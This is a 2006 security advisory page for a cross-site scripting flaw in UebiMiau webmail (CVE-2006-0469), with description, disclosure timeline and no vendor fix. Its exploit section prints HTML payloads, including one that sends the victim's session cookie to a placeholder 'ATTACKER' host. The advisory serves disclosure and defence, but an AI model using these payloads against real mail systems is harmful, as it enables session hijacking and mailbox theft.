SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
Search :
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

UebiMiau Webmail System Security Vulnerability


Arrow  SecurityAlert : 387
Arrow  CVE : CVE-2006-0469
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : Yes
Arrow  Exploit Given : Yes
Arrow  Credit : M.Neset KABAKLI
Arrow  Published : 30.01.2006

Arrow  Affected Software : UebiMiau 2.7.9 (latest release) and probably previous versions.



Arrow  Advisory Text :  

I.Vulnerability
UebiMiau Webmail System Cross Site Scripting Vulnerability

II.Vendor
Aldoir Ventura

III.Affected Systems
* UebiMiau 2.7.9 (latest release) and probably previous versions.

IV.About
UebiMiau is a simple, yet efficient mail reader (webmail) supporting both
IMAP and POP3 without dependence of any PHP's extra modules or database
(http://www.uebimiau.org).

V.Description
UebiMiau does not filter HTML e-mail messages correctly, it's possible to
inject mailicious scripting codes to an e-mail. An attacker is able to
hijack a user's session and access victim's mailbox just by sending a
specially crafted e-mail message.

This is a dangerous situation because there is no need to click a link in
some cases, client-side code executing when the user opens crafted e-mail.

VI.Exploit
<img
src="javascript:location.href='http://ATTACKER/StealSessionData/?'+docum
ent.
cookie;" />
<img src="javascript:[XSS];" />
<a href="javascript:location.href='http://ATTACKER/StealSessionData/'">test

link 1</a>
<a href='http://ATTACKER/StealData/'>test link 2</a>

VII.Vulnerability Status
* Vulnerability discovered on 2006-01-12.
* Vendor notified on 2006-01-12.
* No response from vendor, vulnerability published on 2006-01-28.

VIII.Workarounds
* No vendor-supplied patch is currently available.

IX.Credits
M.Neset KABAKLI
Wakiza Software Technologies
neset{at}wakiza{dot}com
www.wakiza.com




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Multiple Vendors libc/gdtoa printf(3) Array Overrun

Security Risk High- 2009-05-30

SecurityReason realised new advisory about vulnerabilities libc/gdtoa...

Apache RSS Apache Alert

» Apache Tomcat
   RequestDispatcher
   directory traversal
   vulnerability

» Apache mod_dav / svn
   Remote Denial of Service
   Exploit

» Apache Tomcat Information
   disclosure

» Apache Tomcat User
   enumeration vulnerability
   with FORM authentication

PHP RSS PHP Alert

» PHP 5.2.9 curl safe_mode
   & open_basedir bypass

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

Copyright © SecurityReason.com. All Rights Reserved.